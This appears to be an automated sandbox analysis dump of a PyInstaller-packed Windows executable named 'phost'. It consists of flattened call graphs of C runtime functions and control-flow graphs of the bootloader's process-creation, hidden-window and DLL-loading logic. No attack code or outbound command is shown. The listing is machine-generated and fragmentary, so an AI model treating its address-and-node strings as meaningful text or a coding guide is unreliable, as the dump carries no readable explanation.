7ff62cc8a970 _isindst 17 API calls 19774->19777 19775->19773 19776->19763 19778 7ff62cc893fa 19777->19778 19780 7ff62cc8b2c0 FlsSetValue 19779->19780 19781 7ff62cc8b2a5 FlsGetValue 19779->19781 19782 7ff62cc8b2b2 19780->19782 19784 7ff62cc8b2cd 19780->19784 19781->19782 19783 7ff62cc8b2ba 19781->19783 19785 7ff62cc8a574 __CxxCallCatchBlock 45 API calls 19782->19785 19787 7ff62cc8b2b8 19782->19787 19783->19780 19786 7ff62cc8ec08 _get_daylight 11 API calls 19784->19786 19788 7ff62cc8b335 19785->19788 19789 7ff62cc8b2dc 19786->19789 19799 7ff62cc92334 19787->19799 19790 7ff62cc8b2fa FlsSetValue 19789->19790 19791 7ff62cc8b2ea FlsSetValue 19789->19791 19793 7ff62cc8b306 FlsSetValue 19790->19793 19794 7ff62cc8b318 19790->19794 19792 7ff62cc8b2f3 19791->19792 19795 7ff62cc8a9b8 __free_lconv_num 11 API calls 19792->19795 19793->19792 19796 7ff62cc8af64 _get_daylight 11 API calls 19794->19796 19795->19782 19797 7ff62cc8b320 19796->19797 19798 7ff62cc8a9b8 __free_lconv_num 11 API calls 19797->19798 19798->19787 19822 7ff62cc925a4 19799->19822 19801 7ff62cc92369 19837 7ff62cc92034 19801->19837 19804 7ff62cc92386 19804->19735 19805 7ff62cc8d66c _fread_nolock 12 API calls 19806 7ff62cc92397 19805->19806 19807 7ff62cc9239f 19806->19807 19809 7ff62cc923ae 19806->19809 19808 7ff62cc8a9b8 __free_lconv_num 11 API calls 19807->19808 19808->19804 19809->19809 19844 7ff62cc926dc 19809->19844 19812 7ff62cc924aa 19813 7ff62cc84f78 _get_daylight 11 API calls 19812->19813 19815 7ff62cc924af 19813->19815 19814 7ff62cc92505 19817 7ff62cc9256c 19814->19817 19855 7ff62cc91e64 19814->19855 19818 7ff62cc8a9b8 __free_lconv_num 11 API calls 19815->19818 19816 7ff62cc924c4 19816->19814 19819 7ff62cc8a9b8 __free_lconv_num 11 API calls 19816->19819 19821 7ff62cc8a9b8 __free_lconv_num 11 API calls 19817->19821 19818->19804 19819->19814 19821->19804 19823 7ff62cc925c7 19822->19823 19824 7ff62cc925d1 19823->19824 19870 7ff62cc90348 EnterCriticalSection 19823->19870 19826 7ff62cc92643 19824->19826 19829 7ff62cc8a574 __CxxCallCatchBlock 45 API calls 19824->19829 19826->19801 19830 7ff62cc9265b 19829->19830 19833 7ff62cc8b294 50 API calls 19830->19833 19836 7ff62cc926b2 19830->19836 19834 7ff62cc9269c 19833->19834 19835 7ff62cc92334 65 API calls 19834->19835 19835->19836 19836->19801 19838 7ff62cc84fbc 45 API calls 19837->19838 19839 7ff62cc92048 19838->19839 19840 7ff62cc92054 GetOEMCP 19839->19840 19841 7ff62cc92066 19839->19841 19842 7ff62cc9207b 19840->19842 19841->19842 19843 7ff62cc9206b GetACP 19841->19843 19842->19804 19842->19805 19843->19842 19845 7ff62cc92034 47 API calls 19844->19845 19846 7ff62cc92709 19845->19846 19847 7ff62cc9285f 19846->19847 19849 7ff62cc92746 IsValidCodePage 19846->19849 19853 7ff62cc92760 memcpy_s 19846->19853 19848 7ff62cc7c5c0 _log10_special 8 API calls 19847->19848 19850 7ff62cc924a1 19848->19850 19849->19847 19851 7ff62cc92757 19849->19851 19850->19812 19850->19816 19852 7ff62cc92786 GetCPInfo 19851->19852 19851->19853 19852->19847 19852->19853 19871 7ff62cc9214c 19853->19871 19927 7ff62cc90348 EnterCriticalSection 19855->19927 19872 7ff62cc92189 GetCPInfo 19871->19872 19873 7ff62cc9227f 19871->19873 19872->19873 19874 7ff62cc9219c 19872->19874 19875 7ff62cc7c5c0 _log10_special 8 API calls 19873->19875 19877 7ff62cc92eb0 48 API calls 19874->19877 19876 7ff62cc9231e 19875->19876 19876->19847 19878 7ff62cc92213 19877->19878 19882 7ff62cc97bf4 19878->19882 19881 7ff62cc97bf4 54 API calls 19881->19873 19883 7ff62cc84fbc 45 API calls 19882->19883 19884 7ff62cc97c19 19883->19884 19887 7ff62cc978c0 19884->19887 19888 7ff62cc97901 19887->19888 19889 7ff62cc8f910 _fread_nolock MultiByteToWideChar 19888->19889 19893 7ff62cc9794b 19889->19893 19890 7ff62cc97bc9 19892 7ff62cc7c5c0 _log10_special 8 API calls 19890->19892 19891 7ff62cc97a81 19891->19890 19896 7ff62cc8a9b8 __free_lconv_num 11 API calls 19891->19896 19894 7ff62cc92246 19892->19894 19893->19890 19893->19891 19895 7ff62cc8d66c _fread_nolock 12 API calls 19893->19895 19897 7ff62cc97983 19893->19897 19894->19881 19895->19897 19896->19890 19897->19891 19898 7ff62cc8f910 _fread_nolock MultiByteToWideChar 19897->19898 19899 7ff62cc979f6 19898->19899 19899->19891 19918 7ff62cc8f154 19899->19918 19902 7ff62cc97a41 19902->19891 19904 7ff62cc8f154 __crtLCMapStringW 6 API calls 19902->19904 19903 7ff62cc97a92 19905 7ff62cc8d66c _fread_nolock 12 API calls 19903->19905 19906 7ff62cc97b64 19903->19906 19908 7ff62cc97ab0 19903->19908 19904->19891 19905->19908 19906->19891 19907 7ff62cc8a9b8 __free_lconv_num 11 API calls 19906->19907 19907->19891 19908->19891 19909 7ff62cc8f154 __crtLCMapStringW 6 API calls 19908->19909 19910 7ff62cc97b30 19909->19910 19910->19906 19911 7ff62cc97b50 19910->19911 19912 7ff62cc97b66 19910->19912 19913 7ff62cc90858 WideCharToMultiByte 19911->19913 19914 7ff62cc90858 WideCharToMultiByte 19912->19914 19915 7ff62cc97b5e 19913->19915 19914->19915 19915->19906 19916 7ff62cc97b7e 19915->19916 19916->19891 19917 7ff62cc8a9b8 __free_lconv_num 11 API calls 19916->19917 19917->19891 19919 7ff62cc8ed80 __crtLCMapStringW 5 API calls 19918->19919 19920 7ff62cc8f192 19919->19920 19921 7ff62cc8f19a 19920->19921 19924 7ff62cc8f240 19920->19924 19921->19891 19921->19902 19921->19903 19923 7ff62cc8f203 LCMapStringW 19923->19921 19925 7ff62cc8ed80 __crtLCMapStringW 5 API calls 19924->19925 19926 7ff62cc8f26e __crtLCMapStringW 19925->19926 19926->19923 19929 7ff62cc893b9 19928->19929 19930 7ff62cc8951d 19928->19930 19929->19772 19931 7ff62cc89546 19930->19931 19933 7ff62cc8a9b8 __free_lconv_num 11 API calls 19930->19933 19932 7ff62cc8a9b8 __free_lconv_num 11 API calls 19931->19932 19932->19929 19933->19930 19935 7ff62cc96331 19934->19935 19936 7ff62cc96348 19934->19936 19937 7ff62cc84f78 _get_daylight 11 API calls 19935->19937 19936->19935 19938 7ff62cc96356 19936->19938 19939 7ff62cc96336 19937->19939 19941 7ff62cc84fbc 45 API calls 19938->19941 19942 7ff62cc96341 19938->19942 19940 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19939->19940 19940->19942 19941->19942 19942->19614 19944 7ff62cc84fbc 45 API calls 19943->19944 19945 7ff62cc98fe1 19944->19945 19948 7ff62cc98c38 19945->19948 19950 7ff62cc98c86 19948->19950 19949 7ff62cc7c5c0 _log10_special 8 API calls 19951 7ff62cc97275 19949->19951 19952 7ff62cc98d0d 19950->19952 19954 7ff62cc98cf8 GetCPInfo 19950->19954 19957 7ff62cc98d11 19950->19957 19951->19614 19951->19637 19953 7ff62cc8f910 _fread_nolock MultiByteToWideChar 19952->19953 19952->19957 19955 7ff62cc98da5 19953->19955 19954->19952 19954->19957 19956 7ff62cc8d66c _fread_nolock 12 API calls 19955->19956 19955->19957 19958 7ff62cc98ddc 19955->19958 19956->19958 19957->19949 19958->19957 19959 7ff62cc8f910 _fread_nolock MultiByteToWideChar 19958->19959 19960 7ff62cc98e4a 19959->19960 19961 7ff62cc98f2c 19960->19961 19962 7ff62cc8f910 _fread_nolock MultiByteToWideChar 19960->19962 19961->19957 19963 7ff62cc8a9b8 __free_lconv_num 11 API calls 19961->19963 19964 7ff62cc98e70 19962->19964 19963->19957 19964->19961 19965 7ff62cc8d66c _fread_nolock 12 API calls 19964->19965 19966 7ff62cc98e9d 19964->19966 19965->19966 19966->19961 19967 7ff62cc8f910 _fread_nolock MultiByteToWideChar 19966->19967 19968 7ff62cc98f14 19967->19968 19969 7ff62cc98f34 19968->19969 19970 7ff62cc98f1a 19968->19970 19977 7ff62cc8efd8 19969->19977 19970->19961 19972 7ff62cc8a9b8 __free_lconv_num 11 API calls 19970->19972 19972->19961 19974 7ff62cc98f73 19974->19957 19976 7ff62cc8a9b8 __free_lconv_num 11 API calls 19974->19976 19975 7ff62cc8a9b8 __free_lconv_num 11 API calls 19975->19974 19976->19957 19978 7ff62cc8ed80 __crtLCMapStringW 5 API calls 19977->19978 19980 7ff62cc8f016 19978->19980 19979 7ff62cc8f01e 19979->19974 19979->19975 19980->19979 19981 7ff62cc8f240 __crtLCMapStringW 5 API calls 19980->19981 19982 7ff62cc8f087 CompareStringW 19981->19982 19982->19979 19984 7ff62cc97cb1 19983->19984 19985 7ff62cc97cca HeapSize 19983->19985 19986 7ff62cc84f78 _get_daylight 11 API calls 19984->19986 19987 7ff62cc97cb6 19986->19987 19988 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19987->19988 19989 7ff62cc97cc1 19988->19989 19989->19646 19991 7ff62cc97d03 19990->19991 19992 7ff62cc97cf9 19990->19992 19994 7ff62cc97d08 19991->19994 20000 7ff62cc97d0f _get_daylight 19991->20000 19993 7ff62cc8d66c _fread_nolock 12 API calls 19992->19993 19999 7ff62cc97d01 19993->19999 19997 7ff62cc8a9b8 __free_lconv_num 11 API calls 19994->19997 19995 7ff62cc97d42 HeapReAlloc 19995->19999 19995->20000 19996 7ff62cc97d15 19998 7ff62cc84f78 _get_daylight 11 API calls 19996->19998 19997->19999 19998->19999 19999->19645 20000->19995 20000->19996 20001 7ff62cc93600 _get_daylight 2 API calls 20000->20001 20001->20000 20003 7ff62cc8ed80 __crtLCMapStringW 5 API calls 20002->20003 20004 7ff62cc8efb4 20003->20004 20004->19650 20006 7ff62cc8556a 20005->20006 20007 7ff62cc85546 20005->20007 20008 7ff62cc855c4 20006->20008 20009 7ff62cc8556f 20006->20009 20011 7ff62cc8a9b8 __free_lconv_num 11 API calls 20007->20011 20013 7ff62cc85555 20007->20013 20010 7ff62cc8f910 _fread_nolock MultiByteToWideChar 20008->20010 20012 7ff62cc85584 20009->20012 20009->20013 20014 7ff62cc8a9b8 __free_lconv_num 11 API calls 20009->20014 20018 7ff62cc855e0 20010->20018 20011->20013 20015 7ff62cc8d66c _fread_nolock 12 API calls 20012->20015 20013->19654 20013->19655 20014->20012 20015->20013 20016 7ff62cc855e7 GetLastError 20017 7ff62cc84eec _fread_nolock 11 API calls 20016->20017 20020 7ff62cc855f4 20017->20020 20018->20016 20021 7ff62cc8a9b8 __free_lconv_num 11 API calls 20018->20021 20025 7ff62cc85615 20018->20025 20026 7ff62cc85622 20018->20026 20019 7ff62cc8f910 _fread_nolock MultiByteToWideChar 20023 7ff62cc85666 20019->20023 20024 7ff62cc84f78 _get_daylight 11 API calls 20020->20024 20021->20025 20022 7ff62cc8d66c _fread_nolock 12 API calls 20022->20026 20023->20013 20023->20016 20024->20013 20025->20022 20026->20013 20026->20019 20028 7ff62cc89295 20027->20028 20039 7ff62cc89291 20027->20039 20048 7ff62cc92aac GetEnvironmentStringsW 20028->20048 20031 7ff62cc892ae 20055 7ff62cc893fc 20031->20055 20032 7ff62cc892a2 20033 7ff62cc8a9b8 __free_lconv_num 11 API calls 20032->20033 20033->20039 20036 7ff62cc8a9b8 __free_lconv_num 11 API calls 20037 7ff62cc892d5 20036->20037 20038 7ff62cc8a9b8 __free_lconv_num 11 API calls 20037->20038 20038->20039 20039->19682 20040 7ff62cc8963c 20039->20040 20041 7ff62cc8965f 20040->20041 20046 7ff62cc89676 20040->20046 20041->19682 20042 7ff62cc8f910 MultiByteToWideChar _fread_nolock 20042->20046 20043 7ff62cc8ec08 _get_daylight 11 API calls 20043->20046 20044 7ff62cc896ea 20045 7ff62cc8a9b8 __free_lconv_num 11 API calls 20044->20045 20045->20041 20046->20041 20046->20042 20046->20043 20046->20044 20047 7ff62cc8a9b8 __free_lconv_num 11 API calls 20046->20047 20047->20046 20049 7ff62cc8929a 20048->20049 20052 7ff62cc92ad0 20048->20052 20049->20031 20049->20032 20050 7ff62cc8d66c _fread_nolock 12 API calls 20051 7ff62cc92b07 memcpy_s 20050->20051 20053 7ff62cc8a9b8 __free_lconv_num 11 API calls 20051->20053 20052->20050 20054 7ff62cc92b27 FreeEnvironmentStringsW 20053->20054 20054->20049 20056 7ff62cc89424 20055->20056 20057 7ff62cc8ec08 _get_daylight 11 API calls 20056->20057 20067 7ff62cc8945f 20057->20067 20058 7ff62cc8a9b8 __free_lconv_num 11 API calls 20059 7ff62cc892b6 20058->20059 20059->20036 20060 7ff62cc894e1 20061 7ff62cc8a9b8 __free_lconv_num 11 API calls 20060->20061 20061->20059 20062 7ff62cc8ec08 _get_daylight 11 API calls 20062->20067 20063 7ff62cc894d0 20064 7ff62cc89518 11 API calls 20063->20064 20066 7ff62cc894d8 20064->20066 20065 7ff62cc904e4 37 API calls 20065->20067 20068 7ff62cc8a9b8 __free_lconv_num 11 API calls 20066->20068 20067->20060 20067->20062 20067->20063 20067->20065 20069 7ff62cc89504 20067->20069 20070 7ff62cc89467 20067->20070 20072 7ff62cc8a9b8 __free_lconv_num 11 API calls 20067->20072 20068->20070 20071 7ff62cc8a970 _isindst 17 API calls 20069->20071 20070->20058 20073 7ff62cc89516 20071->20073 20072->20067 20076 7ff62cc98ba1 __crtLCMapStringW 20074->20076 20075 7ff62cc9715e 20075->19709 20075->19710 20076->20075 20077 7ff62cc8efd8 6 API calls 20076->20077 20077->20075 19212 7ff62cc7cbc0 19213 7ff62cc7cbd0 19212->19213 19229 7ff62cc89c18 19213->19229 19215 7ff62cc7cbdc 19235 7ff62cc7ceb8 19215->19235 19217 7ff62cc7d19c 7 API calls 19219 7ff62cc7cc75 19217->19219 19218 7ff62cc7cbf4 _RTC_Initialize 19227 7ff62cc7cc49 19218->19227 19240 7ff62cc7d068 19218->19240 19221 7ff62cc7cc09 19243 7ff62cc89084 19221->19243 19227->19217 19228 7ff62cc7cc65 19227->19228 19230 7ff62cc89c29 19229->19230 19231 7ff62cc89c31 19230->19231 19232 7ff62cc84f78 _get_daylight 11 API calls 19230->19232 19231->19215 19233 7ff62cc89c40 19232->19233 19234 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19233->19234 19234->19231 19236 7ff62cc7cec9 19235->19236 19239 7ff62cc7cece __scrt_release_startup_lock 19235->19239 19237 7ff62cc7d19c 7 API calls 19236->19237 19236->19239 19238 7ff62cc7cf42 19237->19238 19239->19218 19268 7ff62cc7d02c 19240->19268 19242 7ff62cc7d071 19242->19221 19244 7ff62cc7cc15 19243->19244 19245 7ff62cc890a4 19243->19245 19244->19227 19267 7ff62cc7d13c InitializeSListHead 19244->19267 19246 7ff62cc890c2 GetModuleFileNameW 19245->19246 19247 7ff62cc890ac 19245->19247 19251 7ff62cc890ed 19246->19251 19248 7ff62cc84f78 _get_daylight 11 API calls 19247->19248 19249 7ff62cc890b1 19248->19249 19250 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 19249->19250 19250->19244 19283 7ff62cc89024 19251->19283 19254 7ff62cc89135 19255 7ff62cc84f78 _get_daylight 11 API calls 19254->19255 19256 7ff62cc8913a 19255->19256 19259 7ff62cc8a9b8 __free_lconv_num 11 API calls 19256->19259 19257 7ff62cc8916f 19260 7ff62cc8a9b8 __free_lconv_num 11 API calls 19257->19260 19258 7ff62cc8914d 19258->19257 19261 7ff62cc891b4 19258->19261 19262 7ff62cc8919b 19258->19262 19259->19244 19260->19244 19264 7ff62cc8a9b8 __free_lconv_num 11 API calls 19261->19264 19263 7ff62cc8a9b8 __free_lconv_num 11 API calls 19262->19263 19265 7ff62cc891a4 19263->19265 19264->19257 19266 7ff62cc8a9b8 __free_lconv_num 11 API calls 19265->19266 19266->19244 19269 7ff62cc7d046 19268->19269 19271 7ff62cc7d03f 19268->19271 19272 7ff62cc8a25c 19269->19272 19271->19242 19275 7ff62cc89e98 19272->19275 19282 7ff62cc90348 EnterCriticalSection 19275->19282 19284 7ff62cc8903c 19283->19284 19285 7ff62cc89074 19283->19285 19284->19285 19286 7ff62cc8ec08 _get_daylight 11 API calls 19284->19286 19285->19254 19285->19258 19287 7ff62cc8906a 19286->19287 19288 7ff62cc8a9b8 __free_lconv_num 11 API calls 19287->19288 19288->19285 20792 7ff62cc9ae6e 20793 7ff62cc9ae87 20792->20793 20794 7ff62cc9ae7d 20792->20794 20796 7ff62cc903a8 LeaveCriticalSection 20794->20796 19302 7ff62cc9add9 19305 7ff62cc854e8 LeaveCriticalSection 19302->19305

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 7ff62cc78bd0-7ff62cc78d16 call 7ff62cc7c8c0 call 7ff62cc79400 SetConsoleCtrlHandler GetStartupInfoW call 7ff62cc85460 call 7ff62cc8a4ec call 7ff62cc8878c call 7ff62cc85460 call 7ff62cc8a4ec call 7ff62cc8878c call 7ff62cc85460 call 7ff62cc8a4ec call 7ff62cc8878c GetCommandLineW CreateProcessW 23 7ff62cc78d3d-7ff62cc78d79 RegisterClassW 0->23 24 7ff62cc78d18-7ff62cc78d38 GetLastError call 7ff62cc72c50 0->24 26 7ff62cc78d7b GetLastError 23->26 27 7ff62cc78d81-7ff62cc78dd5 CreateWindowExW 23->27 31 7ff62cc79029-7ff62cc7904f call 7ff62cc7c5c0 24->31 26->27 29 7ff62cc78dd7-7ff62cc78ddd GetLastError 27->29 30 7ff62cc78ddf-7ff62cc78de4 ShowWindow 27->30 32 7ff62cc78dea-7ff62cc78dfa WaitForSingleObject 29->32 30->32 34 7ff62cc78dfc 32->34 35 7ff62cc78e78-7ff62cc78e7f 32->35 39 7ff62cc78e00-7ff62cc78e03 34->39 36 7ff62cc78ec2-7ff62cc78ec9 35->36 37 7ff62cc78e81-7ff62cc78e91 WaitForSingleObject 35->37 42 7ff62cc78fb0-7ff62cc78fc9 GetMessageW 36->42 43 7ff62cc78ecf-7ff62cc78ee5 QueryPerformanceFrequency QueryPerformanceCounter 36->43 40 7ff62cc78fe8-7ff62cc78ff2 37->40 41 7ff62cc78e97-7ff62cc78ea7 TerminateProcess 37->41 44 7ff62cc78e0b-7ff62cc78e12 39->44 45 7ff62cc78e05 GetLastError 39->45 49 7ff62cc78ff4-7ff62cc78ffa DestroyWindow 40->49 50 7ff62cc79001-7ff62cc79025 GetExitCodeProcess CloseHandle * 2 40->50 51 7ff62cc78ea9 GetLastError 41->51 52 7ff62cc78eaf-7ff62cc78ebd WaitForSingleObject 41->52 47 7ff62cc78fcb-7ff62cc78fd9 TranslateMessage DispatchMessageW 42->47 48 7ff62cc78fdf-7ff62cc78fe6 42->48 53 7ff62cc78ef0-7ff62cc78f28 MsgWaitForMultipleObjects PeekMessageW 43->53 44->37 46 7ff62cc78e14-7ff62cc78e31 PeekMessageW 44->46 45->44 54 7ff62cc78e66-7ff62cc78e76 WaitForSingleObject 46->54 55 7ff62cc78e33-7ff62cc78e64 TranslateMessage DispatchMessageW PeekMessageW 46->55 47->48 48->40 48->42 49->50 50->31 51->52 52->40 56 7ff62cc78f2a 53->56 57 7ff62cc78f63-7ff62cc78f6a 53->57 54->35 54->39 55->54 55->55 58 7ff62cc78f30-7ff62cc78f61 TranslateMessage DispatchMessageW PeekMessageW 56->58 57->42 59 7ff62cc78f6c-7ff62cc78f95 QueryPerformanceCounter 57->59 58->57 58->58 59->53 60 7ff62cc78f9b-7ff62cc78fa2 59->60 60->40 61 7ff62cc78fa4-7ff62cc78fa8 60->61 61->42
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                              • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                              • Instruction ID: b159eae329c0bc85a85ee568c798fbc114d92dfde71437af0e6046ae3e281688
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CD16032B08A8296EF208F38EC646B93774FF84B68F404235DA5D96AA4DF3CD559D701

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 62 7ff62cc71000-7ff62cc73806 call 7ff62cc7fe88 call 7ff62cc7fe90 call 7ff62cc7c8c0 call 7ff62cc85460 call 7ff62cc854f4 call 7ff62cc736b0 76 7ff62cc73808-7ff62cc7380f 62->76 77 7ff62cc73814-7ff62cc73836 call 7ff62cc71950 62->77 78 7ff62cc73c97-7ff62cc73cb2 call 7ff62cc7c5c0 76->78 83 7ff62cc7383c-7ff62cc73856 call 7ff62cc71c80 77->83 84 7ff62cc7391b-7ff62cc73931 call 7ff62cc745b0 77->84 88 7ff62cc7385b-7ff62cc7389b call 7ff62cc78a20 83->88 89 7ff62cc7396a-7ff62cc7397f call 7ff62cc72710 84->89 90 7ff62cc73933-7ff62cc73960 call 7ff62cc77f80 84->90 97 7ff62cc7389d-7ff62cc738a3 88->97 98 7ff62cc738c1-7ff62cc738cc call 7ff62cc84fa0 88->98 104 7ff62cc73c8f 89->104 102 7ff62cc73984-7ff62cc739a6 call 7ff62cc71c80 90->102 103 7ff62cc73962-7ff62cc73965 call 7ff62cc800bc 90->103 99 7ff62cc738a5-7ff62cc738ad 97->99 100 7ff62cc738af-7ff62cc738bd call 7ff62cc78b90 97->100 110 7ff62cc739fc-7ff62cc73a2a call 7ff62cc78b30 call 7ff62cc78b90 * 3 98->110 111 7ff62cc738d2-7ff62cc738e1 call 7ff62cc78a20 98->111 99->100 100->98 115 7ff62cc739b0-7ff62cc739b9 102->115 103->89 104->78 138 7ff62cc73a2f-7ff62cc73a3e call 7ff62cc78a20 110->138 120 7ff62cc738e7-7ff62cc738ed 111->120 121 7ff62cc739f4-7ff62cc739f7 call 7ff62cc84fa0 111->121 115->115 116 7ff62cc739bb-7ff62cc739d8 call 7ff62cc71950 115->116 116->88 127 7ff62cc739de-7ff62cc739ef call 7ff62cc72710 116->127 125 7ff62cc738f0-7ff62cc738fc 120->125 121->110 128 7ff62cc73905-7ff62cc73908 125->128 129 7ff62cc738fe-7ff62cc73903 125->129 127->104 128->121 132 7ff62cc7390e-7ff62cc73916 call 7ff62cc84fa0 128->132 129->125 129->128 132->138 141 7ff62cc73a44-7ff62cc73a47 138->141 142 7ff62cc73b45-7ff62cc73b53 138->142 141->142 143 7ff62cc73a4d-7ff62cc73a50 141->143 144 7ff62cc73b59-7ff62cc73b5d 142->144 145 7ff62cc73a67 142->145 146 7ff62cc73a56-7ff62cc73a5a 143->146 147 7ff62cc73b14-7ff62cc73b17 143->147 148 7ff62cc73a6b-7ff62cc73a90 call 7ff62cc84fa0 144->148 145->148 146->147 149 7ff62cc73a60 146->149 150 7ff62cc73b19-7ff62cc73b1d 147->150 151 7ff62cc73b2f-7ff62cc73b40 call 7ff62cc72710 147->151 157 7ff62cc73aab-7ff62cc73ac0 148->157 158 7ff62cc73a92-7ff62cc73aa6 call 7ff62cc78b30 148->158 149->145 150->151 153 7ff62cc73b1f-7ff62cc73b2a 150->153 159 7ff62cc73c7f-7ff62cc73c87 151->159 153->148 161 7ff62cc73be8-7ff62cc73bfa call 7ff62cc78a20 157->161 162 7ff62cc73ac6-7ff62cc73aca 157->162 158->157 159->104 169 7ff62cc73bfc-7ff62cc73c02 161->169 170 7ff62cc73c2e 161->170 164 7ff62cc73bcd-7ff62cc73be2 call 7ff62cc71940 162->164 165 7ff62cc73ad0-7ff62cc73ae8 call 7ff62cc852c0 162->165 164->161 164->162 175 7ff62cc73aea-7ff62cc73b02 call 7ff62cc852c0 165->175 176 7ff62cc73b62-7ff62cc73b7a call 7ff62cc852c0 165->176 173 7ff62cc73c04-7ff62cc73c1c 169->173 174 7ff62cc73c1e-7ff62cc73c2c 169->174 177 7ff62cc73c31-7ff62cc73c40 call 7ff62cc84fa0 170->177 173->177 174->177 175->164 186 7ff62cc73b08-7ff62cc73b0f 175->186 184 7ff62cc73b7c-7ff62cc73b80 176->184 185 7ff62cc73b87-7ff62cc73b9f call 7ff62cc852c0 176->185 187 7ff62cc73c46-7ff62cc73c4a 177->187 188 7ff62cc73d41-7ff62cc73d63 call 7ff62cc744d0 177->188 184->185 197 7ff62cc73bac-7ff62cc73bc4 call 7ff62cc852c0 185->197 198 7ff62cc73ba1-7ff62cc73ba5 185->198 186->164 190 7ff62cc73cd4-7ff62cc73ce6 call 7ff62cc78a20 187->190 191 7ff62cc73c50-7ff62cc73c5f call 7ff62cc790e0 187->191 201 7ff62cc73d65-7ff62cc73d6f call 7ff62cc74620 188->201 202 7ff62cc73d71-7ff62cc73d82 call 7ff62cc71c80 188->202 207 7ff62cc73ce8-7ff62cc73ceb 190->207 208 7ff62cc73d35-7ff62cc73d3c 190->208 205 7ff62cc73cb3-7ff62cc73cb6 call 7ff62cc78850 191->205 206 7ff62cc73c61 191->206 197->164 219 7ff62cc73bc6 197->219 198->197 210 7ff62cc73d87-7ff62cc73d96 201->210 202->210 218 7ff62cc73cbb-7ff62cc73cbd 205->218 213 7ff62cc73c68 call 7ff62cc72710 206->213 207->208 214 7ff62cc73ced-7ff62cc73d10 call 7ff62cc71c80 207->214 208->213 216 7ff62cc73d98-7ff62cc73d9f 210->216 217 7ff62cc73dc4-7ff62cc73dda call 7ff62cc79400 210->217 226 7ff62cc73c6d-7ff62cc73c77 213->226 228 7ff62cc73d2b-7ff62cc73d33 call 7ff62cc84fa0 214->228 229 7ff62cc73d12-7ff62cc73d26 call 7ff62cc72710 call 7ff62cc84fa0 214->229 216->217 222 7ff62cc73da1-7ff62cc73da5 216->222 234 7ff62cc73ddc 217->234 235 7ff62cc73de8-7ff62cc73e04 SetDllDirectoryW 217->235 224 7ff62cc73cc8-7ff62cc73ccf 218->224 225 7ff62cc73cbf-7ff62cc73cc6 218->225 219->164 222->217 230 7ff62cc73da7-7ff62cc73dbe SetDllDirectoryW LoadLibraryExW 222->230 224->210 225->213 226->159 228->210 229->226 230->217 234->235 238 7ff62cc73e0a-7ff62cc73e19 call 7ff62cc78a20 235->238 239 7ff62cc73f01-7ff62cc73f08 235->239 251 7ff62cc73e1b-7ff62cc73e21 238->251 252 7ff62cc73e32-7ff62cc73e3c call 7ff62cc84fa0 238->252 241 7ff62cc73ffc-7ff62cc74004 239->241 242 7ff62cc73f0e-7ff62cc73f15 239->242 246 7ff62cc74029-7ff62cc7405b call 7ff62cc736a0 call 7ff62cc73360 call 7ff62cc73670 call 7ff62cc76fb0 call 7ff62cc76d60 241->246 247 7ff62cc74006-7ff62cc74023 PostMessageW GetMessageW 241->247 242->241 245 7ff62cc73f1b-7ff62cc73f25 call 7ff62cc733c0 242->245 245->226 259 7ff62cc73f2b-7ff62cc73f3f call 7ff62cc790c0 245->259 247->246 256 7ff62cc73e2d-7ff62cc73e2f 251->256 257 7ff62cc73e23-7ff62cc73e2b 251->257 261 7ff62cc73ef2-7ff62cc73efc call 7ff62cc78b30 252->261 262 7ff62cc73e42-7ff62cc73e48 252->262 256->252 257->256 271 7ff62cc73f64-7ff62cc73fa0 call 7ff62cc78b30 call 7ff62cc78bd0 call 7ff62cc76fb0 call 7ff62cc76d60 call 7ff62cc78ad0 259->271 272 7ff62cc73f41-7ff62cc73f5e PostMessageW GetMessageW 259->272 261->239 262->261 266 7ff62cc73e4e-7ff62cc73e54 262->266 269 7ff62cc73e56-7ff62cc73e58 266->269 270 7ff62cc73e5f-7ff62cc73e61 266->270 275 7ff62cc73e5a 269->275 276 7ff62cc73e67-7ff62cc73e83 call 7ff62cc76db0 call 7ff62cc77330 269->276 270->239 270->276 307 7ff62cc73fa5-7ff62cc73fa7 271->307 272->271 275->239 290 7ff62cc73e85-7ff62cc73e8c 276->290 291 7ff62cc73e8e-7ff62cc73e95 